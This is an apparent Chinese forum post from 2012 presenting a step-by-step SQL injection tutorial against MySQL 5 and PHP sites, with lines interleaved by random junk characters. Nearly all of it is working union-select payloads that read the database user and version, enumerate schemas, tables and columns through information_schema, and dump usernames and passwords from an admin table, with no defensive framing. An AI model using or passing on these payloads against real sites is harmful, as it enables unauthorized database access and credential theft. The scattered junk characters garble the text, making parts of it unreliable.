! z3 s; i! A2 G5 h, G
教程内容:Mysql 5+php 注入
g) m, \# d5 \% s7 r: ?7 U& l5 f* h/ ]6 n# w
2 T* }* }; ^3 m0 r) M
' O$ V$ n( ~8 m8 D8 k一.查看MYSQL基本信息(库名,版本,用户)
7 c S# Q6 {6 z1 G' M5 P
* [# Z4 G* c& V6 _% S; vand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
8 P/ ^2 c# X# H
3 |1 c7 I6 A) {二.查数据库
9 K: q9 C( W; Z
3 F& c5 R" w" y, }" W {; |and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
8 ?) _4 p' a5 }. w" s3 ]! X* y Tlimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。) S# W1 a. q3 ]& E& v! r
5 q( N. [3 q% k( j p三.暴表
& |1 w4 O ?! `; u) T; E. k8 U. c$ [0 A& n" ~4 }. x& C. [
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
* _8 e: B8 F% ?. q, u8 T
7 `4 ^: {: f, e: r6 |. f& Glimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。1 S* e# }& x4 ~. \
$ v9 _# g4 {! f" n! j% q' v
四.暴字段; I5 ^- ?! l' w ?% `4 a+ b4 I
% \! I( F9 O% G jand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
4 a2 O2 B( q9 j& j% P( N& D; I9 w* }; N& @: @1 R8 L0 Y8 C
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
) f. m$ [+ m! t" e" Q$ J8 u7 h6 z1 C( g4 a( L. o. J& h
五.暴数据0 A& ^( b! w$ U: c7 z
! S9 w" A( `0 P1 h2 M, `" Z' }8 l
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
, {8 q9 z) |8 j& k
, t; o' O1 \: _! g5 |& c! L0 o" C8 D: h/ H' @. w. a9 Z+ T: `2 |& V R
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
1 P' ?- L7 f; @ C( ~ |
发表于 2012-9-13 16:27:53
收藏
支持
反对